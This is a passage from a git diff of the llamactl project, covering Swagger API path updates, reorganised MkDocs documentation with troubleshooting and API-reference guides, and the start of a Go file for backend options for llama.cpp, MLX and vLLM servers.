          description: Invalid name format
          schema:
@@ -517,8 +500,8 @@ paths:
      - ApiKeyAuth: []
      summary: Start a stopped instance
      tags:
-      - instances
+      - Instances
-  /instances/{name}/stop:
+  /api/v1/instances/{name}/stop:
    post:
      description: Stops a specific instance by name
      parameters:
@@ -531,7 +514,7 @@ paths:
        "200":
          description: Stopped instance details
          schema:
-            $ref: '#/definitions/instance.Process'
+            $ref: '#/definitions/instance.Instance'
        "400":
          description: Invalid name format
          schema:
@@ -544,7 +527,444 @@ paths:
      - ApiKeyAuth: []
      summary: Stop a running instance
      tags:
-      - instances
+      - Instances
  /api/v1/nodes:
    get:
      description: Returns a map of all nodes configured in the server (node name
        -> node config)
      responses:
        "200":
          description: Map of nodes
          schema:
            additionalProperties:
              $ref: '#/definitions/server.NodeResponse'
            type: object
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: List all configured nodes
      tags:
      - Nodes
  /api/v1/nodes/{name}:
    get:
      description: Returns the details of a specific node by name
      parameters:
      - description: Node Name
        in: path
        name: name
        required: true
        type: string
      responses:
        "200":
          description: Node details
          schema:
            $ref: '#/definitions/server.NodeResponse'
        "400":
          description: Invalid name format
          schema:
            type: string
        "404":
          description: Node not found
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Get details of a specific node
      tags:
      - Nodes
  /api/v1/version:
    get:
      description: Returns the version of the llamactl command
      responses:
        "200":
          description: Version information
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Get llamactl version
      tags:
      - System
  /llama-cpp/{name}/:
    get:
      description: Proxies requests to the llama.cpp UI for the specified instance
      parameters:
      - description: Instance Name
        in: query
        name: name
        required: true
        type: string
      produces:
      - text/html
      responses:
        "200":
          description: Proxied HTML response
          schema:
            type: string
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp UI for the instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/apply-template:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/completion:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/detokenize:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/embeddings:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/infill:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/metrics:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/props:
    get:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/reranking:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/slots:
    get:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /llama-cpp/{name}/tokenize:
    post:
      description: Proxies requests to the specified llama.cpp server instance, starting
        it on-demand if configured
      parameters:
      - description: Instance Name
        in: path
        name: name
        required: true
        type: string
      produces:
      - application/json
      responses:
        "200":
          description: Proxied response
          schema:
            additionalProperties: true
            type: object
        "400":
          description: Invalid instance
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Proxy requests to llama.cpp server instance
      tags:
      - Llama.cpp
  /v1/:
    post:
      consumes:
@@ -567,7 +987,7 @@ paths:
      - ApiKeyAuth: []
      summary: OpenAI-compatible proxy endpoint
      tags:
-      - openai
+      - OpenAI
  /v1/models:
    get:
      description: Returns a list of instances in a format compatible with OpenAI
@@ -585,22 +1005,10 @@ paths:
      - ApiKeyAuth: []
      summary: List instances in OpenAI-compatible format
      tags:
-      - openai
+      - OpenAI
-  /version:
+securityDefinitions:
-    get:
+  ApiKeyAuth:
-      description: Returns the version of the llamactl command
+    in: header
-      responses:
+    name: X-API-Key
-        "200":
+    type: apiKey
          description: Version information
          schema:
            type: string
        "500":
          description: Internal Server Error
          schema:
            type: string
      security:
      - ApiKeyAuth: []
      summary: Get llamactl version
      tags:
      - version
 swagger: "2.0"
--- a/docs/troubleshooting.md
+++ b/docs/troubleshooting.md
@@ -0,0 +1,193 @@
 # Troubleshooting
 Issues specific to Llamactl deployment and operation.
 ## Configuration Issues
 ### Invalid Configuration
 **Problem:** Invalid configuration preventing startup
 **Solutions:**
 1. Use minimal configuration:
   ```yaml
   server:
     host: "0.0.0.0"
     port: 8080
   instances:
     port_range: [8000, 9000]
   ```
 2. Check data directory permissions:
   ```bash
   # Ensure data directory is writable (default: ~/.local/share/llamactl)
   mkdir -p ~/.local/share/llamactl/{instances,logs}
   ```
 ## Instance Management Issues
 ### Instance Fails to Start
 **Problem:** Instance fails to start or immediately stops
 **Solutions:**
 1. **Check instance logs** to see the actual error:
   ```bash
   curl http://localhost:8080/api/v1/instances/{name}/logs
   # Or check log files directly
   tail -f ~/.local/share/llamactl/logs/{instance-name}.log
   ```
 2. **Verify backend is installed:**  
     - **llama.cpp**: Ensure `llama-server` is in PATH
     - **MLX**: Ensure `mlx-lm` Python package is installed
     - **vLLM**: Ensure `vllm` Python package is installed
 3. **Check model path and format:**
     - Use absolute paths to model files
     - Verify model format matches backend (GGUF for llama.cpp, etc.)
 4. **Verify backend command configuration:**
     - Check that the backend `command` is correctly configured in the global config
     - For virtual environments, specify the full path to the command (e.g., `/path/to/venv/bin/mlx_lm.server`)
     - See the [Configuration Guide](configuration.md) for backend configuration details
     - Test the backend directly (see [Backend-Specific Issues](#backend-specific-issues) below)
 ### Backend-Specific Issues
 **Problem:** Model loading, memory, GPU, or performance issues
 Most model-specific issues (memory, GPU configuration, performance tuning) are backend-specific and should be resolved by consulting the respective backend documentation:
 **llama.cpp:**
 - [llama.cpp GitHub](https://github.com/ggml-org/llama.cpp)
 - [llama-server README](https://github.com/ggml-org/llama.cpp/blob/master/tools/server/README.md)
 **MLX:**
 - [MLX-LM GitHub](https://github.com/ml-explore/mlx-lm)
 - [MLX-LM Server Guide](https://github.com/ml-explore/mlx-lm/blob/main/mlx_lm/SERVER.md)
 **vLLM:**
 - [vLLM Documentation](https://docs.vllm.ai/en/stable/)
 - [OpenAI Compatible Server](https://docs.vllm.ai/en/stable/serving/openai_compatible_server.html)
 - [vllm serve Command](https://docs.vllm.ai/en/stable/cli/serve.html#vllm-serve)
 **Testing backends directly:**
 Testing your model and configuration directly with the backend helps determine if the issue is with llamactl or the backend itself:
 ```bash
 # llama.cpp
 llama-server --model /path/to/model.gguf --port 8081
 # MLX
 mlx_lm.server --model mlx-community/Mistral-7B-Instruct-v0.3-4bit --port 8081
 # vLLM
 vllm serve microsoft/DialoGPT-medium --port 8081
 ```
 ## API and Network Issues
 ### CORS Errors
 **Problem:** Web UI shows CORS errors in browser console
 **Solutions:**
 1. **Configure allowed origins:**
   ```yaml
   server:
     allowed_origins:
       - "http://localhost:3000"
       - "https://yourdomain.com"
   ```
 ## Authentication Issues
 **Problem:** API requests failing with authentication errors
 **Solutions:**
 1. **Disable authentication temporarily:**
   ```yaml
   auth:
     require_management_auth: false
     require_inference_auth: false
   ```
 2. **Configure API keys:**
   ```yaml
   auth:
     management_keys:
       - "your-management-key"
     inference_keys:
       - "your-inference-key"
   ```
 3. **Use correct Authorization header:**
   ```bash
   curl -H "Authorization: Bearer your-api-key" \
     http://localhost:8080/api/v1/instances
   ```
 ## Remote Node Issues
 ### Node Configuration
 **Problem:** Remote instances not appearing or cannot be managed
 **Solutions:**
 1. **Verify node configuration:**
   ```yaml
   local_node: "main"  # Must match a key in nodes map
   nodes:
     main:
       address: ""     # Empty for local node
     worker1:
       address: "http://worker1.internal:8080"
       api_key: "secure-key"  # Must match worker1's management key
   ```
 2. **Check node name consistency:**
   - `local_node` on each node must match what other nodes call it
   - Node names are case-sensitive
 3. **Test remote node connectivity:**
   ```bash
   curl -H "Authorization: Bearer remote-node-key" \
     http://remote-node:8080/api/v1/instances
   ```
 ## Debugging and Logs
 ### Viewing Instance Logs
 ```bash
 # Get instance logs via API
 curl http://localhost:8080/api/v1/instances/{name}/logs
 # Or check log files directly
 tail -f ~/.local/share/llamactl/logs/{instance-name}.log
 ```
 ### Enable Debug Logging
 ```bash
 export LLAMACTL_LOG_LEVEL=debug
 llamactl
 ```
 ## Getting Help
 When reporting issues, include:
 1. **System information:**
   ```bash
   llamactl --version
   ```
 2. **Configuration file** (remove sensitive keys)
 3. **Relevant log output**
 4. **Steps to reproduce the issue**
--- a/docs/user-guide/api-reference.md
+++ b/docs/user-guide/api-reference.md
@@ -1,508 +0,0 @@
 # API Reference
 Complete reference for the Llamactl REST API.
 ## Base URL
 All API endpoints are relative to the base URL:
 ```
 http://localhost:8080/api/v1
 ```
 ## Authentication
 Llamactl supports API key authentication. If authentication is enabled, include the API key in the Authorization header:
 ```bash
 curl -H "Authorization: Bearer <your-api-key>" \
  http://localhost:8080/api/v1/instances
 ```
 The server supports two types of API keys:
 - **Management API Keys**: Required for instance management operations (CRUD operations on instances)
 - **Inference API Keys**: Required for OpenAI-compatible inference endpoints
 ## System Endpoints
 ### Get Llamactl Version
 Get the version information of the llamactl server.
 ```http
 GET /api/v1/version
 ```
 **Response:**
 ```
 Version: 1.0.0
 Commit: abc123
 Build Time: 2024-01-15T10:00:00Z
 ```
 ### Get Llama Server Help
 Get help text for the llama-server command.
 ```http
 GET /api/v1/server/help
 ```
 **Response:** Plain text help output from `llama-server --help`
 ### Get Llama Server Version
 Get version information of the llama-server binary.
 ```http
 GET /api/v1/server/version
 ```
 **Response:** Plain text version output from `llama-server --version`
 ### List Available Devices
 List available devices for llama-server.
 ```http
 GET /api/v1/server/devices
 ```
 **Response:** Plain text device list from `llama-server --list-devices`
 ## Instances
 ### List All Instances
 Get a list of all instances.
 ```http
 GET /api/v1/instances
 ```
 **Response:**
 ```json
 [
  {
    "name": "llama2-7b",
    "status": "running",
    "created": 1705312200
  }
 ]
 ```
 ### Get Instance Details
 Get detailed information about a specific instance.
 ```http
 GET /api/v1/instances/{name}
 ```
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "running",
  "created": 1705312200
 }
 ```
 ### Create Instance
 Create and start a new instance.
 ```http
 POST /api/v1/instances/{name}
 ```
 **Request Body:** JSON object with instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "running",
  "created": 1705312200
 }
 ```
 ### Update Instance
 Update an existing instance configuration. See [Managing Instances](managing-instances.md) for available configuration options.
 ```http
 PUT /api/v1/instances/{name}
 ```
 **Request Body:** JSON object with configuration fields to update.
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "running",
  "created": 1705312200
 }
 ```
 ### Delete Instance
 Stop and remove an instance.
 ```http
 DELETE /api/v1/instances/{name}
 ```
 **Response:** `204 No Content`
 ## Instance Operations
 ### Start Instance
 Start a stopped instance.
 ```http
 POST /api/v1/instances/{name}/start
 ```
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "running",
  "created": 1705312200
 }
 ```
 **Error Responses:**
 - `409 Conflict`: Maximum number of running instances reached
 - `500 Internal Server Error`: Failed to start instance
 ### Stop Instance
 Stop a running instance.
 ```http
 POST /api/v1/instances/{name}/stop
 ```
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "stopped",
  "created": 1705312200
 }
 ```
 ### Restart Instance
 Restart an instance (stop then start).
 ```http
 POST /api/v1/instances/{name}/restart
 ```
 **Response:**
 ```json
 {
  "name": "llama2-7b",
  "status": "running",
  "created": 1705312200
 }
 ```
 ### Get Instance Logs
 Retrieve instance logs.
 ```http
 GET /api/v1/instances/{name}/logs
 ```
 **Query Parameters:**
 - `lines`: Number of lines to return (default: all lines, use -1 for all)
 **Response:** Plain text log output
 **Example:**
 ```bash
 curl "http://localhost:8080/api/v1/instances/my-instance/logs?lines=100"
 ```
 ### Proxy to Instance
 Proxy HTTP requests directly to the llama-server instance.
 ```http
 GET /api/v1/instances/{name}/proxy/*
 POST /api/v1/instances/{name}/proxy/*
 ```
 This endpoint forwards all requests to the underlying llama-server instance running on its configured port. The proxy strips the `/api/v1/instances/{name}/proxy` prefix and forwards the remaining path to the instance.
 **Example - Check Instance Health:**
 ```bash
 curl -H "Authorization: Bearer your-api-key" \
  http://localhost:8080/api/v1/instances/my-model/proxy/health
 ```
 This forwards the request to `http://instance-host:instance-port/health` on the actual llama-server instance.
 **Error Responses:**
 - `503 Service Unavailable`: Instance is not running
 ## OpenAI-Compatible API
 Llamactl provides OpenAI-compatible endpoints for inference operations.
 ### List Models
 List all instances in OpenAI-compatible format.
 ```http
 GET /v1/models
 ```
 **Response:**
 ```json
 {
  "object": "list",
  "data": [
    {
      "id": "llama2-7b",
      "object": "model",
      "created": 1705312200,
      "owned_by": "llamactl"
    }
  ]
 }
 ```
 ### Chat Completions, Completions, Embeddings
 All OpenAI-compatible inference endpoints are available:
 ```http
 POST /v1/chat/completions
 POST /v1/completions
 POST /v1/embeddings
 POST /v1/rerank
 POST /v1/reranking
 ```
 **Request Body:** Standard OpenAI format with `model` field specifying the instance name
 **Example:**
 ```json
 {
  "model": "llama2-7b",
  "messages": [
    {
      "role": "user",
      "content": "Hello, how are you?"
    }
  ]
 }
 ```
 The server routes requests to the appropriate instance based on the `model` field in the request body. Instances with on-demand starting enabled will be automatically started if not running. For configuration details, see [Managing Instances](managing-instances.md).
 **Error Responses:**
 - `400 Bad Request`: Invalid request body or missing instance name
 - `503 Service Unavailable`: Instance is not running and on-demand start is disabled
 - `409 Conflict`: Cannot start instance due to maximum instances limit
 ## Instance Status Values
 Instances can have the following status values:
 - `stopped`: Instance is not running
 - `running`: Instance is running and ready to accept requests
 - `failed`: Instance failed to start or crashed  
 ## Error Responses
 All endpoints may return error responses in the following format:
 ```json
 {
  "error": "Error message description"
 }
 ```
 ### Common HTTP Status Codes
 - `200`: Success
 - `201`: Created
 - `204`: No Content (successful deletion)
 - `400`: Bad Request (invalid parameters or request body)
 - `401`: Unauthorized (missing or invalid API key)
 - `403`: Forbidden (insufficient permissions)
 - `404`: Not Found (instance not found)
 - `409`: Conflict (instance already exists, max instances reached)
 - `500`: Internal Server Error
 - `503`: Service Unavailable (instance not running)
 ## Examples
 ### Complete Instance Lifecycle
 ```bash
 # Create and start instance
 curl -X POST http://localhost:8080/api/v1/instances/my-model \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer your-api-key" \
  -d '{
    "model": "/models/llama-2-7b.gguf"
  }'
 # Check instance status
 curl -H "Authorization: Bearer your-api-key" \
  http://localhost:8080/api/v1/instances/my-model
 # Get instance logs
 curl -H "Authorization: Bearer your-api-key" \
  "http://localhost:8080/api/v1/instances/my-model/logs?lines=50"
 # Use OpenAI-compatible chat completions
 curl -X POST http://localhost:8080/v1/chat/completions \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer your-inference-api-key" \
  -d '{
    "model": "my-model",
    "messages": [
      {"role": "user", "content": "Hello!"}
    ],
    "max_tokens": 100
  }'
 # Stop instance
 curl -X POST -H "Authorization: Bearer your-api-key" \
  http://localhost:8080/api/v1/instances/my-model/stop
 # Delete instance
 curl -X DELETE -H "Authorization: Bearer your-api-key" \
  http://localhost:8080/api/v1/instances/my-model
 ```
 ### Using the Proxy Endpoint
 You can also directly proxy requests to the llama-server instance:
 ```bash
 # Direct proxy to instance (bypasses OpenAI compatibility layer)
 curl -X POST http://localhost:8080/api/v1/instances/my-model/proxy/completion \
  -H "Content-Type: application/json" \
  -H "Authorization: Bearer your-api-key" \
  -d '{
    "prompt": "Hello, world!",
    "n_predict": 50
  }'
 ```
 ## Backend-Specific Endpoints
 ### Parse Commands
 Llamactl provides endpoints to parse command strings from different backends into instance configuration options.
 #### Parse Llama.cpp Command
 Parse a llama-server command string into instance options.
 ```http
 POST /api/v1/backends/llama-cpp/parse-command
 ```
 **Request Body:**
 ```json
 {
  "command": "llama-server -m /path/to/model.gguf -c 2048 --port 8080"
 }
 ```
 **Response:**
 ```json
 {
  "backend_type": "llama_cpp",
  "llama_server_options": {
    "model": "/path/to/model.gguf",
    "ctx_size": 2048,
    "port": 8080
  }
 }
 ```
 #### Parse MLX-LM Command
 Parse an MLX-LM server command string into instance options.
 ```http
 POST /api/v1/backends/mlx/parse-command
 ```
 **Request Body:**
 ```json
 {
  "command": "mlx_lm.server --model /path/to/model --port 8080"
 }
 ```
 **Response:**
 ```json
 {
  "backend_type": "mlx_lm",
  "mlx_server_options": {
    "model": "/path/to/model",
    "port": 8080
  }
 }
 ```
 #### Parse vLLM Command
 Parse a vLLM serve command string into instance options.
 ```http
 POST /api/v1/backends/vllm/parse-command
 ```
 **Request Body:**
 ```json
 {
  "command": "vllm serve /path/to/model --port 8080"
 }
 ```
 **Response:**
 ```json
 {
  "backend_type": "vllm",
  "vllm_server_options": {
    "model": "/path/to/model",
    "port": 8080
  }
 }
 ```
 **Error Responses for Parse Commands:**
 - `400 Bad Request`: Invalid request body, empty command, or parse error
 - `500 Internal Server Error`: Encoding error
 ## Auto-Generated Documentation
 The API documentation is automatically generated from code annotations using Swagger/OpenAPI. To regenerate the documentation:
 1. Install the swag tool: `go install github.com/swaggo/swag/cmd/swag@latest`
 2. Generate docs: `swag init -g cmd/server/main.go -o apidocs`
 ## Swagger Documentation
 If swagger documentation is enabled in the server configuration, you can access the interactive API documentation at:
 ```
 http://localhost:8080/swagger/
 ```
 This provides a complete interactive interface for testing all API endpoints.
--- a/docs/user-guide/troubleshooting.md
+++ b/docs/user-guide/troubleshooting.md
@@ -1,160 +0,0 @@
 # Troubleshooting
 Issues specific to Llamactl deployment and operation.
 ## Configuration Issues
 ### Invalid Configuration
 **Problem:** Invalid configuration preventing startup
 **Solutions:**
 1. Use minimal configuration:
   ```yaml
   server:
     host: "0.0.0.0"
     port: 8080
   instances:
     port_range: [8000, 9000]
   ```
 2. Check data directory permissions:
   ```bash
   # Ensure data directory is writable (default: ~/.local/share/llamactl)
   mkdir -p ~/.local/share/llamactl/{instances,logs}
   ```
 ## Instance Management Issues
 ### Model Loading Failures
 **Problem:** Instance fails to start with model loading errors
 **Common Solutions:**  
 - **llama-server not found:** Ensure `llama-server` binary is in PATH  
 - **Wrong model format:** Ensure model is in GGUF format  
 - **Insufficient memory:** Use smaller model or reduce context size  
 - **Path issues:** Use absolute paths to model files  
 ### Memory Issues
 **Problem:** Out of memory errors or system becomes unresponsive
 **Solutions:**
 1. **Reduce context size:**
   ```json
   {
     "n_ctx": 1024
   }
   ```
 2. **Use quantized models:**  
   - Try Q4_K_M instead of higher precision models  
   - Use smaller model variants (7B instead of 13B)  
 ### GPU Configuration
 **Problem:** GPU not being used effectively
 **Solutions:**
 1. **Configure GPU layers:**
   ```json
   {
     "n_gpu_layers": 35
   }
   ```
 ### Advanced Instance Issues
 **Problem:** Complex model loading, performance, or compatibility issues
 Since llamactl uses `llama-server` under the hood, many instance-related issues are actually llama.cpp issues. For advanced troubleshooting:
 **Resources:**  
 - **llama.cpp Documentation:** [https://github.com/ggml/llama.cpp](https://github.com/ggml/llama.cpp)  
 - **llama.cpp Issues:** [https://github.com/ggml/llama.cpp/issues](https://github.com/ggml/llama.cpp/issues)  
 - **llama.cpp Discussions:** [https://github.com/ggml/llama.cpp/discussions](https://github.com/ggml/llama.cpp/discussions)  
 **Testing directly with llama-server:**  
 ```bash
 # Test your model and parameters directly with llama-server
 llama-server --model /path/to/model.gguf --port 8081 --n-gpu-layers 35
 ```
 This helps determine if the issue is with llamactl or with the underlying llama.cpp/llama-server.
 ## API and Network Issues
 ### CORS Errors
 **Problem:** Web UI shows CORS errors in browser console
 **Solutions:**
 1. **Configure allowed origins:**
   ```yaml
   server:
     allowed_origins:
       - "http://localhost:3000"
       - "https://yourdomain.com"
   ```
 ## Authentication Issues
 **Problem:** API requests failing with authentication errors
 **Solutions:**
 1. **Disable authentication temporarily:**
   ```yaml
   auth:
     require_management_auth: false
     require_inference_auth: false
   ```
 2. **Configure API keys:**
   ```yaml
   auth:
     management_keys:
       - "your-management-key"
     inference_keys:
       - "your-inference-key"
   ```
 3. **Use correct Authorization header:**
   ```bash
   curl -H "Authorization: Bearer your-api-key" \
     http://localhost:8080/api/v1/instances
   ```
 ## Debugging and Logs
 ### Viewing Instance Logs
 ```bash
 # Get instance logs via API
 curl http://localhost:8080/api/v1/instances/{name}/logs
 # Or check log files directly
 tail -f ~/.local/share/llamactl/logs/{instance-name}.log
 ```
 ### Enable Debug Logging
 ```bash
 export LLAMACTL_LOG_LEVEL=debug
 llamactl
 ```
 ## Getting Help
 When reporting issues, include:
 1. **System information:**
   ```bash
   llamactl --version
   ```
 2. **Configuration file** (remove sensitive keys)
 3. **Relevant log output**
 4. **Steps to reproduce the issue**
--- a/mkdocs.yml
+++ b/mkdocs.yml
@@ -25,8 +25,8 @@ theme:
        name: Switch to light mode
  features:
    - navigation.tabs
-    - navigation.sections
+    - navigation.tabs.sticky
-    - navigation.expand
+    - toc.integrate
    - navigation.top
    - search.highlight
    - search.share
@@ -49,14 +49,12 @@ markdown_extensions:
 nav:
  - Home: index.md
-  - Getting Started:
+  - Installation: installation.md
-    - Installation: getting-started/installation.md
+  - Quick Start: quick-start.md
-    - Quick Start: getting-started/quick-start.md
+  - Configuration: configuration.md
-    - Configuration: getting-started/configuration.md
+  - Managing Instances: managing-instances.md
-  - User Guide:
+  - API Reference: api-reference.md
-    - Managing Instances: user-guide/managing-instances.md
+  - Troubleshooting: troubleshooting.md
    - API Reference: user-guide/api-reference.md
    - Troubleshooting: user-guide/troubleshooting.md
 plugins:
  - search
@@ -66,9 +64,12 @@ plugins:
      css_dir: css
      javascript_dir: js
      canonical_version: null
  - neoteroi.mkdocsoad:
      use_pymdownx: true
 hooks:
  - docs/readme_sync.py
  - docs/fix_line_endings.py
 extra:
  version:
@@ -77,3 +78,6 @@ extra:
  social:
    - icon: fontawesome/brands/github
      link: https://github.com/lordmathis/llamactl
 extra_css:
 - css/css-v1.1.3.css
--- a/pkg/backends/backend.go
+++ b/pkg/backends/backend.go
@@ -1,10 +1,252 @@
 package backends
 import (
 	"encoding/json"
 	"fmt"
 	"llamactl/pkg/config"
 	"llamactl/pkg/validation"
 	"maps"
 )
 type BackendType string
 const (
 	BackendTypeLlamaCpp BackendType = "llama_cpp"
 	BackendTypeMlxLm    BackendType = "mlx_lm"
 	BackendTypeVllm     BackendType = "vllm"
 	// BackendTypeMlxVlm BackendType = "mlx_vlm"  // Future expansion
 )
 type backend interface {
 	BuildCommandArgs() []string
 	BuildDockerArgs() []string
 	GetPort() int
 	SetPort(int)
 	GetHost() string
 	Validate() error
 	ParseCommand(string) (any, error)
 }
 var backendConstructors = map[BackendType]func() backend{
 	BackendTypeLlamaCpp: func() backend { return &LlamaServerOptions{} },
 	BackendTypeMlxLm:    func() backend { return &MlxServerOptions{} },
 	BackendTypeVllm:     func() backend { return &VllmServerOptions{} },
 }
 type Options struct {
 	BackendType    BackendType    `json:"backend_type"`
 	BackendOptions map[string]any `json:"backend_options,omitempty"`
 	// Backend-specific options
 	LlamaServerOptions *LlamaServerOptions `json:"-"`
 	MlxServerOptions   *MlxServerOptions   `json:"-"`
 	VllmServerOptions  *VllmServerOptions  `json:"-"`
 }
 func (o *Options) UnmarshalJSON(data []byte) error {
 	type Alias Options
 	aux := &struct {
 		*Alias
 	}{
 		Alias: (*Alias)(o),
 	}
 	if err := json.Unmarshal(data, aux); err != nil {
 		return err
 	}
 	// Create backend from constructor map
 	if o.BackendOptions != nil {
 		constructor, exists := backendConstructors[o.BackendType]
 		if !exists {
 			return fmt.Errorf("unsupported backend type: %s", o.BackendType)
 		}
 		backend := constructor()
 		optionsData, err := json.Marshal(o.BackendOptions)
 		if err != nil {
 			return fmt.Errorf("failed to marshal backend options: %w", err)
 		}
 		if err := json.Unmarshal(optionsData, backend); err != nil {
 			return fmt.Errorf("failed to unmarshal backend options: %w", err)
 		}
 		// Store in the appropriate typed field for backward compatibility
 		o.setBackendOptions(backend)
 	}
 	return nil
 }
 func (o *Options) MarshalJSON() ([]byte, error) {
 	type Alias Options
 	aux := &struct {
 		*Alias
 	}{
 		Alias: (*Alias)(o),
 	}
 	// Get backend and marshal it
 	backend := o.getBackend()
 	if backend != nil {
 		optionsData, err := json.Marshal(backend)
 		if err != nil {
 			return nil, fmt.Errorf("failed to marshal backend options: %w", err)
 		}
 		if err := json.Unmarshal(optionsData, &aux.BackendOptions); err != nil {
 			return nil, fmt.Errorf("failed to unmarshal backend options to map: %w", err)
 		}
 	}
 	return json.Marshal(aux)
 }
 // setBackendOptions stores the backend in the appropriate typed field
 func (o *Options) setBackendOptions(bcknd backend) {
 	switch v := bcknd.(type) {
 	case *LlamaServerOptions:
 		o.LlamaServerOptions = v
 	case *MlxServerOptions:
 		o.MlxServerOptions = v
 	case *VllmServerOptions:
 		o.VllmServerOptions = v
 	}
 }
 func (o *Options) getBackendSettings(backendConfig *config.BackendConfig) *config.BackendSettings {
 	switch o.BackendType {
 	case BackendTypeLlamaCpp:
 		return &backendConfig.LlamaCpp
 	case BackendTypeMlxLm:
 		return &backendConfig.MLX
 	case BackendTypeVllm:
 		return &backendConfig.VLLM
 	default:
 		return nil
 	}
 }
 // getBackend returns the actual backend implementation
 func (o *Options) getBackend() backend {
 	switch o.BackendType {
 	case BackendTypeLlamaCpp:
 		return o.LlamaServerOptions
 	case BackendTypeMlxLm:
 		return o.MlxServerOptions
 	case BackendTypeVllm:
 		return o.VllmServerOptions
 	default:
 		return nil
 	}
 }
 func (o *Options) isDockerEnabled(backend *config.BackendSettings) bool {
